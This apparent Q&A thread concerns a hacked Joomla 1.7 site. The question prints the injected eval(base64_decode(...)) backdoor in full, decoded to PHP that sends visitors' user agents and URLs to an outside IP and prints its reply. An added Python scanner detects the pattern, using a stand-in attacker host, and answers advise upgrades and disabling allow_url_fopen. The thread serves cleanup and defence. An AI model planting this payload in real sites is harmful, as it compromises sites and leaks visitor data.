Question

I'm running a Joomla 1.7 site which was hacked today. The script below did the hack.

eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));

The above line was injected into the index.php file of my templates folder. Every template in the folder had the above code. In each file it was repeated a few times.

When I decode the code, it outputs

print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));

I removed the script and the site happens to work fine. The script didn't do anything bad except that the site did not load at all.

My problem is: even when I have set the file permissions to 644 and the folder permissions to 755, how could this happen?

How can I figure out what caused the problem? What steps should I take to prevent this from happening in the future?

UPDATE

This Forum Post Assistant / FPA is very helpful

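As an added example (not code from the question or from Joomla), a small Python scanner that finds the eval(base64_decode(...)) injection shape shown above in template files, decodes each payload and flags remote fetching or use of request data; the sample template and the host attacker.invalid are constructed, not taken from the question.

```python
import base64
import re
from pathlib import Path

# Matches the injection shape from the question: eval(base64_decode("<blob>")),
# tolerating extra parentheses, either quote style and whitespace inside the blob.
EVAL_B64 = re.compile(
    r"""eval\s*\(+\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)+""", re.I)

# Strings in a decoded payload that indicate remote fetching or request-data leakage.
SUSPICIOUS = ("file_get_contents", "curl_", "fsockopen", "$_SERVER", "$_REQUEST")


def find_encoded_evals(source: str) -> list:
    """Return one record per eval(base64_decode(...)) found in PHP source text."""
    findings = []
    for m in EVAL_B64.finditer(source):
        blob = re.sub(r"\s+", "", m.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            decoded = "<undecodable>"
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded.strip(),
            "flags": [s for s in SUSPICIOUS if s in decoded],
        })
    return findings


def scan_templates(root: Path) -> dict:
    """Map each infected .php file under root (e.g. Joomla's templates/) to its findings."""
    report = {}
    for php in sorted(root.rglob("*.php")):
        hits = find_encoded_evals(php.read_text(errors="replace"))
        if hits:
            report[str(php.relative_to(root))] = hits
    return report


# Constructed sample (hypothetical host attacker.invalid) with the same injection shape.
PAYLOAD = ("print @file_get_contents('http://attacker.invalid/links.php?ua=' "
           ". @urlencode($_SERVER['HTTP_USER_AGENT']));")
SAMPLE_TEMPLATE = ("<?php\ndefined('_JEXEC') or die;\n"
                   'eval((base64_decode("%s")));\n?>\n<html></html>\n'
                   % base64.b64encode(PAYLOAD.encode()).decode())

if __name__ == "__main__":
    for hit in find_encoded_evals(SAMPLE_TEMPLATE):
        print("line %d flags=%s\n  %s" % (hit["line"], hit["flags"], hit["decoded"]))
```

Run scan_templates(Path("templates")) from the Joomla root to list every template file carrying the injection, then compare the decoded payloads with the one in the question.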

Solution 2

How about because you're running a Joomla 1.7 site? Joomla 1.7 is no longer supported and several security fixes have been added into Joomla since it was released. You should immediately upgrade to 2.5.9. There should be no backwards compatibility issues as 2.5.9 is just the Long Term Supported Release of Joomla 1.7.

Check your PHP settings are as advised in the Joomla Security Checklist here. Make sure your PHP and MySQL versions are reasonably up to date (at least PHP 5.3.x - preferably 5.4.x - and MySQL at least 5.0.4).

Finally, make sure all your extensions are up to date. Again, developers constantly update modules not just to add new features but also to add in extra/improved security or to protect against found vulnerabilities!

Also, please note that not turning on allow_url_fopen, like Steven says, will cause Joomla's One-Click-Update to stop working properly.

OTHER TIPS

It is not reading a file from your file system, but rather reading directly from an external URL. You can disable reading from any external URL in PHP via the php.ini setting:

allow_url_fopen = 0

It's not possible from what you've told us to pinpoint the cause of the hack, but the most likely reason (almost certain) is that you're running old versions of some software, which have known security holes that the hacker was able to attack.

  • Check your version of PHP: if it's anything lower than v5.3.21 or v5.4.11 (i.e. the current versions) you probably have security holes. If it's v5.2 or lower then it is definitely vulnerable (5.2 hasn't been supported for two years now). If your hosting provider is not up to date with their PHP version, then you need to hassle them to fix it. If they won't fix it, you need to find a better host.

  • Check your version of Joomla: is it up to date? You mention it's v1.7: this is not up to date; 1.7 was released a year and a half ago. Current versions are 2.5 and 3.0. That means you almost certainly have security holes in it, which means you can be hacked. Upgrading from 1.7 to 2.5 may be painful, but if you want to be secure, you must do it.

Keeping your software up to date is one of the most important things you can do on a website to keep it secure. It's not optional: If you want to avoid being hacked, you need to keep up to date, and you need to be keeping an eye on new releases constantly -- new security holes are found all the time. Generally most good quality software is fixed fairly quickly when a new bug comes to light, but it's your responsibility to install the fixed version on your server, otherwise the bug will still be there and will likely be hacked.

There are other ways you could have been hacked; let's not discount them; most of them are outside your control. Keeping your software versions updated is your number one best defense.

Licensed under: CC-BY-SA with attribution